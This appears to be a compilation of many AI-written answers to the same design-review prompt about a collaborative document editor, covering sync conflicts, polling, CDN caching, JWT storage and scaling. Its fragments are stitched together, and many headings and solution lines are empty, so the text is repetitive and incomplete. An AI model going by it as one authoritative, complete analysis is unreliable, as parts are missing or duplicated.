Solution: Implement a Pub/Sub mechanism (using Redis Pub/Sub). When a server receives an update, it publishes the change to a Redis channel. Every API server subscribes to this channel and broadcasts the update to all its connected clients.
Issue: Relying on client-side timestamps for conflict resolution is dangerous. Client clocks drift; a user with a "future" clock will consistently overwrite everyone else's work. Furthermore, LWW at the paragraph level results in "lost updates" (e.g., if User A adds a word and User B adds a word to the same paragraph, one user's edit is deleted entirely).
Solution: Move to Operational Transformation (OT) or Conflict-free Replicated Data Types (CRDTs). Use a logical clock (Lamport timestamp) or a central sequencer at the server level to order operations.
Issue: Polling PostgreSQL every 2 seconds is inefficient and creates a "thundering herd" problem as the user base grows. Additionally, the standard "write to DB" flow on every keystroke will kill PostgreSQL performance under load.
Solution:
Issue: Caching API responses for 5 minutes via CloudFront is catastrophic for a collaborative editor. Users will see "stale" document states for up to 5 minutes, effectively breaking real-time collaboration.
Solution: Disable CDN caching for WebSocket-related API endpoints or any document-fetching route. Use Cache-Control headers (no-store, no-cache) for dynamic document data.
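A sketch of such a header policy as an Express-style middleware (hypothetical helper; shown here framework-independent, with plain `req`/`res` objects):

```javascript
// Force dynamic document routes to bypass the CDN while leaving
// static assets cacheable. CloudFront honors origin Cache-Control.
function noStoreForApi(req, res, next) {
  if (req.path.startsWith("/api/")) {
    res.setHeader("Cache-Control", "no-store, no-cache, must-revalidate");
  }
  next();
}
```

Mounted early in the middleware chain (e.g., `app.use(noStoreForApi)`), this guarantees no document endpoint can accidentally inherit the 5-minute CDN cache.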
Issue: Storing JWTs in localStorage makes the application vulnerable to Cross-Site Scripting (XSS) attacks, where a malicious script can steal the token. 24-hour expiry without a refresh mechanism forces a hard logout, disrupting work.
Solution: Store JWTs in HttpOnly, Secure, SameSite=Strict cookies. Implement a Refresh Token rotation strategy.
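The cookie flags can be sketched as a `Set-Cookie` header builder (hypothetical helper name):

```javascript
// Build a Set-Cookie header value for the session token.
// HttpOnly keeps the cookie out of reach of page JavaScript (XSS),
// Secure restricts it to HTTPS, SameSite=Strict blocks cross-site sends (CSRF).
function sessionCookie(name, token, maxAgeSeconds) {
  return [
    `${name}=${encodeURIComponent(token)}`,
    `Max-Age=${maxAgeSeconds}`,
    "Path=/",
    "HttpOnly",
    "Secure",
    "SameSite=Strict",
  ].join("; ");
}
```

The same cookie is sent automatically on the WebSocket upgrade request, so the handshake can be authenticated without exposing the token to client-side code.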
Issue: Saving full HTML snapshots every 30 seconds is inefficient for long documents and creates a "gap" where the last 29 seconds of work could be lost if the server crashes.
Solution: Store the Operation Log (the sequence of edits) as the source of truth. Take snapshots only as an optimization to speed up document loading (e.g., once every 100 edits).
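The log-plus-snapshot idea can be sketched as follows (names and the 100-op threshold are illustrative):

```javascript
// Operation log as source of truth; snapshot as a load-time optimization.
// Every edit appends to the log; after every SNAPSHOT_EVERY ops the current
// state is materialized, so a fresh client loads snapshot + trailing ops only.
const SNAPSHOT_EVERY = 100;
const log = [];                        // append-only edit log (functions here, rows in prod)
let snapshot = { state: "", atOp: 0 }; // latest materialized state

function materialize() {
  // Replay only the ops after the last snapshot.
  return log.slice(snapshot.atOp).reduce((s, fn) => fn(s), snapshot.state);
}

function recordEdit(applyFn) {
  log.push(applyFn);
  if (log.length % SNAPSHOT_EVERY === 0) {
    snapshot = { state: materialize(), atOp: log.length };
  }
}
```

Because the log is the source of truth, a crash loses at most the in-flight operation, not 29 seconds of typing, and version history falls out for free.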
Issue: Round-robin load balancing is fine for REST, but WebSockets are long-lived. If the load balancer kills a connection during a rolling deployment, the user loses their collaborative state.
Solution: Implement "Graceful Shutdown" in the Node.js servers, allowing existing WebSocket connections to drain before the server process exits. Use sticky sessions if the architecture requires it, though a well-implemented Pub/Sub model makes this less critical.
| Feature | Current State | Proposed State |
|---|---|---|
| Sync | LWW (Client Timestamps) | CRDTs / OT (Logical Sequencing) |
| Broadcast | Local Server Only | Redis Pub/Sub |
| DB Sync | Polling every 2s | Asynchronous buffering + CDC |
| Caching | 5-min CDN Cache | No caching for dynamic data |
| Auth | LocalStorage | HttpOnly Cookies + Refresh Tokens |
This architecture contains several critical flaws that would prevent it from functioning as a real-time collaborative editor (like Google Docs). It suffers from severe race conditions, unscalable database access patterns, and fundamental misunderstandings of distributed state.
Here is a detailed breakdown of the failure modes, race conditions, and scaling bottlenecks, along with specific solutions and trade-offs.
Issue: Last-Write-Wins (LWW) with Client Clocks
Issue: Isolated WebSockets + Round-Robin Load Balancing
Issue: Polling PostgreSQL Every 2 Seconds
Issue: Saving Full HTML Snapshots Every 30 Seconds
Issue: CDN Caching API Responses for 5 Minutes
If CloudFront caches document fetches (e.g., /api/documents/123), users will load documents that are up to 5 minutes out of date. They will overwrite recent work because their client starts from a stale state.

Issue: JWTs with 24-hour Expiry in LocalStorage
Storing JWTs in localStorage makes them highly vulnerable to Cross-Site Scripting (XSS) attacks. If a malicious script runs, it can steal the token. A 24-hour expiry means the attacker has a full day to impersonate the user, and standard JWTs cannot be easily revoked.

Issue: Document Partitioning by Organization ID
Okay, let's break down the potential failure modes, race conditions, and scaling bottlenecks in this real-time collaborative document editor architecture, along with proposed solutions and their trade-offs. I'll organize this into categories: Frontend, Backend, Database, Real-time Sync, and General.
I. Frontend (React SPA)
II. Backend (Node.js API Servers)
III. Database (PostgreSQL)
IV. Real-time Synchronization (WebSocket & Polling)
V. Storage (HTML Snapshots & CDN)
VI. Authentication (JWT)
Scaling Bottlenecks & Solutions (Beyond those addressed above)
Summary of Critical Improvements
This detailed breakdown should give you a solid understanding of the potential issues and how to address them in this real-time collaborative document editor architecture. Remember that choosing the right solutions involves balancing trade-offs between complexity, cost, and performance.
Here’s a breakdown of potential issues with the provided real-time collaborative editor architecture, along with proposed solutions and associated trade-offs. I'll categorize them for clarity.
I. Failure Modes (System Downtime or Data Loss)
II. Race Conditions (Data Inconsistency)
documents table.
III. Scaling Bottlenecks (Performance Degradation under Load)
Important Considerations:
This analysis provides a starting point for identifying and addressing potential issues. The best solutions will depend on the specific requirements and constraints of the application. A phased rollout with careful monitoring is crucial for success. Remember to prioritize based on risk and impact.
Okay, let's break down the architecture for this real-time collaborative document editor. I'll identify potential failure modes, race conditions, and scaling bottlenecks, followed by proposed solutions with their associated trade-offs.
Here's a comprehensive analysis, categorized for clarity.
I. Failure Modes
II. Race Conditions
III. Scaling Bottlenecks
Here's a breakdown of potential issues in the proposed architecture, along with proposed solutions and their trade-offs.
I. Failure Modes
API Server Failure:
Database Failure:
Redis Failure:
CDN Failure:
Network Issues:
II. Race Conditions
Last-Write-Wins Conflicts:
Session Conflicts:
Data Consistency during Synchronization:
III. Scaling Bottlenecks
PostgreSQL Database:
API Server Load:
Network Bandwidth:
Redis Bottleneck:
Document Serialization/Deserialization:
Summary Table:
| Issue | Failure Mode | Race Condition | Scaling Bottleneck | Solution(s) | Trade-offs |
|---|---|---|---|---|---|
| API Server Failure | Failure | N/A | Capacity | Redundancy, Health Checks, Failover | Infrastructure Cost, Potential Instability |
| Database Failure | Failure | N/A | Capacity | Replication, Backup & Restore, Failover | Complexity, Downtime |
| Redis Failure | Failure | N/A | Capacity | Redis Sentinel or Cluster, DB fallback for sessions | Operational Complexity, Cost |
These changes improve reliability, reduce race conditions, and address scaling bottlenecks, though some add complexity or require additional infrastructure.
Issue: WebSocket connections are server-specific, causing connection loss during server failover or scaling events.
Solution: Implement a connection pool with automatic reconnection logic in the client. Use a consistent hashing load balancer that preserves affinity during scaling.
Trade-offs:
Issue: Client clocks can be out of sync, leading to incorrect conflict resolution where earlier edits overwrite newer ones.
Solution: Implement vector clocks or version vectors instead of simple timestamps. Track edit history and allow manual conflict resolution when detected.
Trade-offs:
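A version-vector comparison, the core of this approach, can be sketched as follows (hypothetical helper; each replica counts only its own edits):

```javascript
// Compare two version vectors. A "dominates" B if it is >= on every
// replica counter and > on at least one. If each is ahead somewhere,
// the edits are concurrent — the true conflict LWW silently loses,
// and the case to surface for manual (or CRDT) resolution.
function compareVectors(a, b) {
  const keys = new Set([...Object.keys(a), ...Object.keys(b)]);
  let aAhead = false, bAhead = false;
  for (const k of keys) {
    const av = a[k] ?? 0, bv = b[k] ?? 0;
    if (av > bv) aAhead = true;
    if (bv > av) bAhead = true;
  }
  if (aAhead && bAhead) return "concurrent"; // real conflict: needs merging
  if (aAhead) return "a-after-b";
  if (bAhead) return "b-after-a";
  return "equal";
}
```

Unlike wall-clock timestamps, this detects concurrency explicitly instead of guessing an order from drifting client clocks.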
Issue: 2-second polling creates unnecessary database load and potential for stale data between servers.
Solution: Replace polling with a publish-subscribe system (like Redis Pub/Sub) for real-time change propagation between servers.
Trade-offs:
Issue: Partitioning by organization ID may lead to hot partitions for large organizations.
Solution: Implement sharding at the document level rather than organization level, with a consistent hashing ring for distribution.
Trade-offs:
Issue: 24-hour expiry and localStorage storage creates poor UX for long sessions and security risks if device is compromised.
Solution: Implement refresh tokens with shorter-lived JWTs. Store refresh tokens in HttpOnly cookies with secure flags.
Trade-offs:
Issue: Storing full HTML snapshots every 30 seconds is inefficient and creates storage bloat.
Solution: Implement operational transformation or differential synchronization to store only changes between versions.
Trade-offs:
Issue: Caching API responses for 5 minutes conflicts with real-time document updates.
Solution: Don't cache document-related API responses. Only cache static assets and user-specific responses with appropriate cache headers.
Trade-offs:
Issue: Multiple servers writing to the same document rows creates lock contention.
Solution: Implement optimistic locking with version numbers or implement a write coordinator pattern for document updates.
Trade-offs:
Issue: Single point of failure for session data if Redis goes down.
Solution: Implement Redis clustering with replication, and add a fallback to database lookup for sessions if Redis is unavailable.
Trade-offs: Cluster operation adds overhead, and the database fallback path is slower, so it must be load-tested before it is actually needed.
Issue: Round-robin load balancing breaks WebSocket affinity when servers are added/removed.
Solution: Use a consistent hashing load balancer that maintains session affinity even as the server pool changes.
Trade-offs: Load is less evenly distributed than with round-robin, and some connections still move when the server pool changes.
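A minimal consistent-hash ring sketch, using a toy FNV-1a hash and illustrative names (not a production implementation). The property that matters for WebSocket affinity is that removing one server only remaps the keys that pointed at it; every other key keeps its server.

```javascript
// Simple 32-bit FNV-1a hash, chosen for brevity.
function fnv1a(str) {
  let h = 0x811c9dc5;
  for (let i = 0; i < str.length; i++) {
    h ^= str.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h;
}

// Place several virtual nodes per server to smooth the distribution.
function buildRing(servers, vnodes = 50) {
  const ring = [];
  for (const s of servers)
    for (let v = 0; v < vnodes; v++) ring.push({ point: fnv1a(`${s}#${v}`), server: s });
  ring.sort((a, b) => a.point - b.point);
  return ring;
}

// A key routes to the first vnode clockwise from its hash.
function route(ring, key) {
  const h = fnv1a(key);
  const entry = ring.find((e) => e.point >= h) || ring[0]; // wrap around
  return entry.server;
}
```

This is why consistent hashing beats round-robin for affinity during scaling: with round-robin, changing the pool reshuffles everything.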
Issue: Client clocks can be significantly out of sync, affecting conflict resolution.
Solution: Implement server-side timestamping for all operations, and adjust client clocks using NTP synchronization.
Trade-offs: Server-side timestamps still don't totally order events arriving at different servers, and NTP keeps clocks only approximately aligned.
Issue: No mechanism to revert to previous versions or track edit history.
Solution: Implement a version control system for documents with regular snapshots and delta storage.
Trade-offs: More storage, and a more complex read path that replays deltas from the nearest snapshot.
Issue: Network partitions can cause some servers to be isolated, leading to inconsistent state.
Solution: Implement a quorum-based system for document updates and use consensus protocols for critical operations.
Trade-offs: Quorum writes and consensus protocols add latency and significant operational complexity; for a document editor this is usually overkill compared with a single authoritative sequencer per document.
Issue: Each server maintains its own WebSocket connections, which can consume significant memory at scale.
Solution: Implement a dedicated WebSocket service that can scale independently, using a message broker to route updates.
Trade-offs: Another service to deploy and monitor, plus an extra broker hop on every message.
Issue: Loading full document history on initial connect can be slow for large documents.
Solution: Implement incremental loading with virtual scrolling, loading only visible portions initially.
Trade-offs: More complex client logic, and features that need the whole document (search, word count) require server-side support.
These solutions address the major failure modes, race conditions, and scaling bottlenecks while considering the trade-offs between complexity, performance, and reliability. The specific implementation would depend on the exact requirements and constraints of the system.
This is a classic first-draft architecture for a real-time system, and it contains several critical flaws. Let's break down the issues, from the most severe to the more subtle, and propose solutions.
These are issues where the timing of events leads to an incorrect or inconsistent state.
Cross-server propagation should happen through a pub/sub channel per document (e.g., `doc-updates:12345`).
These are points where the system can break down completely.
Cross-server change propagation needs a durable feed (e.g., a `document_events` table in PostgreSQL or a system like Kafka).
Storing JWTs in `localStorage` makes them vulnerable to Cross-Site Scripting (XSS) attacks: if any malicious script runs on your page, it can steal the token and impersonate the user. Store the token in an `HttpOnly` cookie instead; this makes it inaccessible to JavaScript and mitigates XSS-based token theft.
These are components that will prevent the system from handling increased load.
This architecture contains several critical flaws that will lead to data corruption, poor user experience, and database failure under load. Specifically, the reliance on client-side clocks for synchronization and polling the database for real-time updates are fundamental anti-patterns for collaborative editing.
Here is the breakdown of failure modes, race conditions, and bottlenecks, ordered by severity, with proposed solutions and trade-offs.
The Issue: The system relies on "Last-write-wins with timestamps from client clocks." This is a fatal flaw for collaborative editing.
Solution: Implement Operational Transformation (OT) or Conflict-free Replicated Data Types (CRDTs).
Trade-offs: OT requires a central server to transform operations and is notoriously hard to implement correctly; CRDTs avoid central transformation but carry per-character metadata that grows with the document.
The Issue: "Other servers poll PostgreSQL every 2 seconds for changes."
Solution: Introduce a Pub/Sub Message Broker (e.g., Redis Pub/Sub, Kafka, or RabbitMQ).
Trade-offs: One more piece of infrastructure to run, and Pub/Sub delivery is at-most-once, so servers need a catch-up mechanism (e.g., replaying the operation log) after a dropped subscription.
The Issue: "Documents saved as full HTML snapshots every 30 seconds."
Solution: Append-Only Operation Log + Periodic Snapshotting.
Append each edit as a row in an append-only `operations` table, and periodically write a snapshot so documents load without replaying the full history.
Trade-offs: Loading a document means replaying operations since the last snapshot, and the log needs periodic compaction to bound storage.
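A sketch of how a document is rebuilt from the latest snapshot plus the operations logged after it; the `{ type, index, text/length }` operation shape and function names are assumptions for illustration.

```javascript
// Apply one logged operation to a document string.
function applyOp(text, op) {
  if (op.type === "insert") {
    return text.slice(0, op.index) + op.text + text.slice(op.index);
  }
  if (op.type === "delete") {
    return text.slice(0, op.index) + text.slice(op.index + op.length);
  }
  throw new Error(`unknown op type: ${op.type}`);
}

// Replay only the operations recorded after the last snapshot.
function rebuild(snapshot, opsSinceSnapshot) {
  return opsSinceSnapshot.reduce(applyOp, snapshot);
}
```

Snapshots bound the replay cost: without them, opening an old document would replay its entire edit history.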
The Issue: "Document partitioning by organization ID."
Solution: Partition by Document ID (Hashing).
Trade-offs: Organization-wide queries (admin views, search) must fan out across shards.
The Issue: "Load balancer (round-robin)" + "Each API server maintains its own WebSocket connections."
Solution: Session Affinity (Sticky Sessions) at the Load Balancer level.
Trade-offs: Load can become uneven when some sessions are heavier than others, and clients still need reconnect logic for when their pinned server dies.
The Issue: "JWT tokens... stored in localStorage."
Any script injected via XSS can read `localStorage` and steal the user's identity token.
Solution: Store JWTs in `HttpOnly`, `Secure`, `SameSite` Cookies.
Trade-offs: Cookies are sent automatically with requests, so you must add CSRF protection (SameSite attributes plus anti-CSRF tokens where needed).
The Issue: "CDN... caches API responses for 5 minutes."
Solution: Do not cache dynamic document content at the CDN.
Trade-offs: Higher origin load, since only static assets remain cacheable at the edge.
To make this system viable, you must: replace client-clock last-write-wins with OT or CRDTs, replace database polling with a pub/sub broker, store operations instead of full HTML snapshots, and stop caching dynamic document APIs at the CDN.
Here is an analysis of the failure modes, race conditions, and scaling bottlenecks in the proposed architecture, followed by specific solutions and their trade-offs.
Issue: Unreliable Client-Clock Timestamps (The "Client Time" Problem)
Last-Write-Wins (LWW) based on timestamps provided by the client's browser clock.
Issue: The "Polling Gap" (2-Second Latency)
Solution: Replace polling with Redis Pub/Sub, publishing each change to a per-document channel (e.g., `doc:123:updates`).
Issue: CDN Cache Invalidation (The "Stale Data" Problem)
Solution: Include a version in the URL (e.g., `GET /doc/123?ver=abc`) so the CDN caches the latest version automatically.
Issue: Full HTML Snapshots vs. Delta Storage
If User A wraps text in a `<b>` tag and User B changes a word, merging the snapshots is error-prone and can corrupt the DOM structure.
Solution: Store deltas as small operations (e.g., `{ "action": "insert", "text": "Hello", "index": 10 }`) rather than the full document.
Issue: Server-Side State Loss (The "Crash" Problem)
Solution: Have clients attach an `idempotency_key` to each operation so that retries after a server crash are applied at most once.
Issue: The "Server Affinity" Bottleneck
This architecture contains several critical flaws that would lead to data loss, poor user experience, and system instability under load. Below is a detailed breakdown of the failure modes, race conditions, and bottlenecks, organized by category.
Issue: The "Isolated Island" Problem (Inter-Server Latency)
Solution: Publish each change to a per-document Redis Pub/Sub channel (e.g., `doc:{id}`). All API servers subscribe to this channel; when Server 2 receives the message, it pushes the update to its connected WebSocket clients immediately.
Issue: Destructive Conflict Resolution (Last-Write-Wins)
Solution: Use Operational Transformation or CRDTs, which model edits as operations (e.g., `insert('a', position 5)`). These algorithms merge concurrent operations mathematically so both changes are preserved.
Issue: Unreliable Timestamps (Client Clocks)
Issue: Write Amplification (Keystroke-to-DB)
Issue: Polling Overhead
Issue: Storage Strategy (Full HTML Snapshots)
Solution: Store an append-only log of operations (e.g., `retain 5, insert 'x'`). Periodically create snapshots (checkpoints) to optimize loading, but rely on the operation log for history.
Issue: CDN Caching API Responses
Solution: Mark document APIs `Cache-Control: no-store`. Use the CDN only for static assets (JS/CSS/images), and add `ETag`s so clients only download full content if it has changed.
Issue: XSS Vulnerability via LocalStorage
Storing JWTs in `localStorage` makes them accessible to any JavaScript running on the page; move them to `HttpOnly` cookies.
Issue: WebSocket Connection State & Load Balancer
This architecture contains several fundamental flaws that would prevent it from functioning correctly at scale, and several others that would cause severe data loss or degraded user experiences.
Here is a comprehensive breakdown of the failure modes, race conditions, and bottlenecks, categorized by system layer, along with specific solutions and trade-offs.
Issue A: Last-Write-Wins (LWW) with Client Clocks
Issue B: The 2-Second Cross-Server Polling Lag
Issue C: Writing Every Keystroke to PostgreSQL
Issue D: Full HTML Snapshots Every 30 Seconds
Issue E: CloudFront Caching API Responses for 5 Minutes
Solution: Set `Cache-Control: no-store` for all document mutation and retrieval APIs.
Issue F: JWT in localStorage
Storing JWTs in `localStorage` makes them highly vulnerable to Cross-Site Scripting (XSS) attacks. If any third-party script or compromised dependency executes `localStorage.getItem('token')`, the attacker has full access to the user's account. Furthermore, a 24-hour expiry with no refresh mechanism means compromised tokens are valid for a full day. Moving tokens into `HttpOnly` cookies with `SameSite=Strict` mitigates most of this.
Issue G: Partitioning by Organization ID
Issue H: Round-Robin Load Balancing with WebSockets
To build this reliably, you should fundamentally alter the data flow: edits flow as operations into a per-document ordered pipeline, are persisted to an append-only log, and are fanned out to all servers via pub/sub rather than discovered by polling.
Failure Modes:
Single Point of Failure: If the PostgreSQL database fails, the whole system becomes unavailable.
Session Cache Failure: If Redis fails, all sessions will be lost.
JWT Token Expiry: If a JWT token expires during an active session, the user will be logged out.
Race Conditions:
Concurrent edits to the same paragraph are resolved by last-write-wins on client timestamps, so one user's changes can be silently discarded.
Scaling Bottlenecks:
Database Scalability: The PostgreSQL database might become a bottleneck when there are many concurrent writes.
WebSocket Connections: Each server maintains its own WebSocket connections. If a server fails, all its connections will be lost.
API Server Load: Increased user activity might overload the API servers.
Certainly! Here’s a thorough analysis of the potential failure modes, race conditions, and scaling bottlenecks in your collaborative document editor architecture, with specific solutions and their trade-offs.
| Problem | Solution | Trade-offs |
|---|---|---|
| Delayed sync, message loss | Redis/Kafka pub-sub for servers | Infra complexity, more ops |
| Client timestamp conflicts | Server timestamps, OT/CRDT | OT/CRDT is complex but robust |
| DB write contention | Batch writes, event log | Batch risk, compaction needed |
| WebSocket stickiness | LB stickiness, central session | Stickiness limits balancing |
| JWT security | HttpOnly, short expiry, refresh | More auth round-trips |
| CDN caches API | No-store for dynamic endpoints | More backend load |
| Data loss on crash | Incremental event logging | More storage, compaction |
| Polling interval | Push (pub/sub) sync model | New infra |
| Org partition hotspots | Sub-partition by docID | More complex sharding |
| Redis cache HA | Redis Sentinel/Cluster | Ops overhead |
| Frontend/backend version skew | Cache busting, API versioning | Deploy complexity |
TL;DR: Replace client-timestamp LWW with server-ordered OT/CRDT sync, swap database polling for pub/sub fan-out, batch writes into an event log, and harden auth and CDN caching.
This architecture broadly covers a real-time collaborative editor but has several potential failure modes, race conditions, and scaling bottlenecks due to design choices like polling, last-write-wins, and distributed WebSocket connections. Below is a detailed analysis and recommendations:
Issue:
Using client-side timestamps for LWW is unreliable. Client clocks can be skewed or manipulated, causing inconsistent conflict resolution and data loss.
Impact:
Edits may be overwritten incorrectly, leading to lost user data or inconsistent document state.
Solution:
Use server-generated timestamps or a logical clock (Lamport clock or vector clocks) to order changes deterministically.
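A Lamport clock sketch (names illustrative): each node increments a counter on local edits and fast-forwards it when it sees remote ones, and ties break deterministically by node ID, giving a total order that never trusts wall clocks.

```javascript
function createLamportClock(nodeId) {
  let counter = 0;
  return {
    // Call when this node generates an edit; stamps the edit.
    tick() { counter += 1; return { counter, nodeId }; },
    // Call when receiving a remote edit; keeps the clock ahead of anything seen.
    observe(remote) { counter = Math.max(counter, remote.counter); },
  };
}

// Total order: compare counters, break ties deterministically by node id.
function lamportCompare(a, b) {
  if (a.counter !== b.counter) return a.counter - b.counter;
  return a.nodeId < b.nodeId ? -1 : a.nodeId > b.nodeId ? 1 : 0;
}
```

The key property: if edit B was made after its author saw edit A, B always sorts after A, regardless of how skewed the machines' wall clocks are.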
Issue:
Polling PostgreSQL every 2 seconds for changes introduces latency in syncing edits across servers. This affects real-time collaboration experience.
Race Condition:
If two servers receive concurrent edits for the same paragraph, polling delay may cause conflicting states before reconciliation.
Scalability Bottleneck:
Frequent polling can overload the database, especially with increasing server count and users.
Solution:
Implement a centralized message broker or pub/sub system (e.g., Redis Pub/Sub, Kafka) to propagate changes instantly to all servers.
Issue:
WebSocket clients connected to different servers do not share state natively. Server-to-server communication is needed for real-time sync.
Failure Mode:
If a server crashes, all its WebSocket connections drop, disconnecting users.
Solution:
Use sticky sessions plus a shared pub/sub layer for cross-server state, so clients can reconnect to any healthy server and resume.
Issue:
Writing every keystroke or small change immediately to PostgreSQL is a performance bottleneck.
Scaling Bottleneck:
High write throughput can overwhelm the DB, causing latency spikes and possible downtime.
Solution:
Batch changes in memory and persist periodically, or append them to an event log (event sourcing) instead of writing each keystroke.
Issue:
Saving entire document snapshots causes large write operations and storage use.
Scaling Bottleneck:
Large documents and frequent snapshots increase DB size, IO, and backup times.
Solution:
Store diffs between versions plus periodic full snapshots, reconstructing the document by replaying diffs from the nearest snapshot.
Security Risk:
LocalStorage is vulnerable to XSS attacks, risking token theft and session hijacking.
Solution:
Store tokens in HttpOnly Secure cookies with proper SameSite flags to mitigate XSS risks.
Issue:
Caching API responses for 5 minutes can cause clients to receive stale data, breaking real-time collaboration consistency.
Solution:
Disable CDN caching for API endpoints entirely; cache only static assets.
Issue:
Round-robin does not respect WebSocket session affinity, causing frequent reconnects or broken sessions.
Solution:
Implement sticky sessions or session-aware load balancing to keep WebSocket connections stable.
Issue:
Single PostgreSQL write master can become bottleneck for high concurrent writes.
Solution:
Shard writes across databases or adopt a multi-master/distributed SQL setup for high write throughput.
Issue:
Redis used for session cache can become a bottleneck or single point of failure.
Solution:
Run Redis as a cluster with replication and automatic failover.
Potential Bottleneck:
Uneven distribution of users per organization can cause hotspots.
Solution:
Rebalance partitions dynamically, sub-partitioning large organizations by document ID.
| Issue | Impact | Solution | Trade-off |
|---|---|---|---|
| Client-side timestamps for LWW | Data inconsistency and loss | Use server or logical clocks | Increased complexity |
| Polling DB every 2 seconds | Latency, DB overload | Use pub/sub message broker | Added infra, complexity |
| Distributed WebSocket connections | User disconnect on server crash | Sticky sessions or shared state | Reduced LB flexibility, complexity |
| Immediate DB writes per change | DB write bottleneck | Batch writes or event sourcing | Durability risk on crash |
| Full HTML snapshot every 30s | Large storage and IO | Store diffs + snapshots | Complex reconstruction logic |
| JWT in localStorage | XSS vulnerability | Use HttpOnly Secure cookies | Need CSRF protection |
| CloudFront caches API for 5 minutes | Stale data, broken real-time | Disable caching for API endpoints | More API load |
| Round-robin LB for WebSockets | Connection instability | Sticky sessions or WebSocket gateway | LB flexibility, added infra |
| Single DB write master | Write bottleneck | Sharding, multi-master DBs | Operational complexity |
| Redis as single session cache | SPOF | Redis cluster with replication | Infra complexity |
| Uneven document partitioning | Hotspots | Dynamic rebalancing | Management complexity |
Implementing these will improve consistency, scalability, security, and user experience in the collaborative document editor.
Let's analyze the architecture step-by-step to identify potential failure modes, race conditions, and scaling bottlenecks, along with proposed solutions and their trade-offs.
Issue: Clients may disconnect unexpectedly due to network issues, server crashes, or load balancer timeouts.
Impact: Loss of real-time updates, potential data inconsistency if not handled properly.
Solution: Implement heartbeat/ping messages to detect dead connections; use WebSocket reconnection strategies on the client.
Trade-off: Increased complexity and network overhead; potential for reconnection storms under high churn.
Issue: Since each API server maintains its own WebSocket connections, load balancer round-robin may distribute WebSocket connections unevenly, causing some servers to be overloaded or underutilized.
Impact: Inefficient resource utilization; potential for dropped connections or latency.
Solution: Use sticky sessions (session affinity) or an application-level routing layer for WebSockets, ensuring clients connect to the same server throughout their session.
Trade-off: Sticky sessions can reduce load balancing flexibility and may require session management.
Issue: Network partitions, disk failures, or database overload could cause write failures.
Impact: Lost changes, inconsistent document state.
Solution: Implement retries with exponential backoff, write-ahead logging, and ensure transactions are atomic.
Trade-off: Increased latency during retries; potential for write conflicts if not handled properly.
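A sketch of the retry-delay calculation with exponential backoff and full jitter (base and cap values are illustrative, not from the original design). Jitter prevents many clients from retrying in lockstep after a shared outage.

```javascript
// attempt 0, 1, 2, ... -> delay in milliseconds.
// `random` is injectable so the function is testable; defaults to Math.random.
function backoffDelayMs(attempt, baseMs = 100, capMs = 30_000, random = Math.random) {
  const exp = Math.min(capMs, baseMs * 2 ** attempt); // exponential growth, capped
  return Math.floor(random() * exp); // "full jitter" spreads out retry storms
}
```

Callers sleep for `backoffDelayMs(attempt)` before retry `attempt`, giving up after a fixed number of attempts so a dead database fails fast instead of queueing forever.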
Issue: Redis could crash or become unreachable.
Impact: Loss of session data or cache invalidation issues.
Solution: Use Redis persistence modes (RDB or AOF), set up Redis Sentinel for failover, or have a fallback to database for critical data.
Trade-off: Additional overhead and complexity; slightly increased latency.
Issue: Changes are broadcast only to clients on the same server, so clients connected to server A miss updates from users on server B until the next poll, and may lose them entirely if server B crashes before persisting.
Impact: Inconsistent document views among clients.
Solution: Implement a centralized message bus (e.g., Redis Pub/Sub or Kafka) for broadcasting changes across servers.
Trade-off: Additional infrastructure complexity and latency.
Issue: Relying solely on timestamps from client clocks can lead to race conditions, especially if clocks are unsynchronized.
Impact: Overwritten changes that are actually later, leading to data loss or confusion.
Solution: Use Lamport timestamps or vector clocks to establish causality, or implement Operational Transformation (OT) or Conflict-free Replicated Data Types (CRDTs) for real-time conflict resolution.
Trade-off: Increased system complexity; OT/CRDTs require significant engineering effort.
Issue: Race conditions may occur if servers read stale data or miss updates between polls.
Impact: Users see outdated content, or conflicting updates.
Solution: Use PostgreSQL's NOTIFY/LISTEN feature to push change notifications to servers, reducing polling frequency and latency.
Trade-off: Additional complexity, potential scalability issues with notification channels.
Issue: PostgreSQL writes are centralized; high write volume can cause bottlenecks.
Impact: Increased latency, potential downtime.
Solution: Use sharding for documents, or employ CQRS pattern—separate command (write) and query (read) models. Consider distributed databases designed for high write throughput (e.g., CockroachDB, YugabyteDB).
Trade-off: Increased complexity in data management and querying.
Issue: Storing full snapshots every 30 seconds increases storage and I/O load, especially for large documents.
Impact: Slow backups, increased storage costs, potential I/O bottleneck.
Solution: Store diffs/patches or OT logs instead of full snapshots, reconstructing full document state as needed.
Trade-off: More complex storage and retrieval logic; may impact performance.
Issue: Each server maintains many WebSocket connections; as user base grows, server memory and CPU demand increase.
Impact: Resource exhaustion, degraded performance.
Solution: Use WebSocket multiplexing or message brokers (like Redis Pub/Sub) to offload some messaging; horizontally scale WebSocket servers with load balancing.
Trade-off: Increased system complexity and potential message routing delays.
| Concern | Potential Issue | Proposed Solution | Trade-offs |
|---|---|---|---|
| JWT token storage in localStorage | Vulnerable to XSS attacks | Use HttpOnly cookies | Slightly less convenient in client code |
| Static asset caching | Cache invalidation issues | Implement cache busting strategies | Increased deployment complexity |
| Document partitioning | Cross-organization queries or shared documents | Enforce strict partitioning; avoid cross-partition joins | Limits querying flexibility |
Overall, the architecture is a solid starting point but requires enhancements in conflict resolution, data consistency, connection management, and scalability to handle real-world load and failure scenarios robustly.
This architecture is designed to support a real-time collaborative document editor but has several potential failure modes, race conditions, and scaling bottlenecks. Let's identify these issues and propose solutions for each:
WebSocket Connection Failure:
API Server Failure:
Database Write Bottleneck:
Cache Invalidation for API Responses:
Data Consistency and Sync Issues:
Timestamp-based Conflict Resolution:
Polling for Changes:
WebSocket Scalability:
Database Scalability:
By addressing these issues with the proposed solutions, the architecture can be made more resilient, scalable, and consistent, accommodating growth and providing a better user experience.
In the architecture you've described for a real-time collaborative document editor, various potential failure modes, race conditions, and scaling bottlenecks can arise. Below, I outline these issues along with proposed solutions and their associated trade-offs.
Issue: WebSockets can disconnect due to network issues or server crashes, leading to loss of real-time updates for users.
Solution: Implement a reconnection strategy that attempts to re-establish the WebSocket connection automatically. Additionally, use a queue on the client-side to store unsent changes during disconnection and send them once reconnected.
Trade-offs: This increases complexity on the client-side and may introduce a delay in sending updates, but it improves user experience by minimizing disruption.
Issue: PostgreSQL might be unavailable or have performance issues, leading to failed writes or reads.
Solution: Implement a retry mechanism with exponential backoff for database operations. Additionally, consider using a message queue system (like RabbitMQ) to queue changes when the database is down, allowing for eventual consistency.
Trade-offs: This adds complexity and potential latency in syncing changes, but it enhances system reliability.
Issue: If an API server crashes, all connected clients will lose their connection.
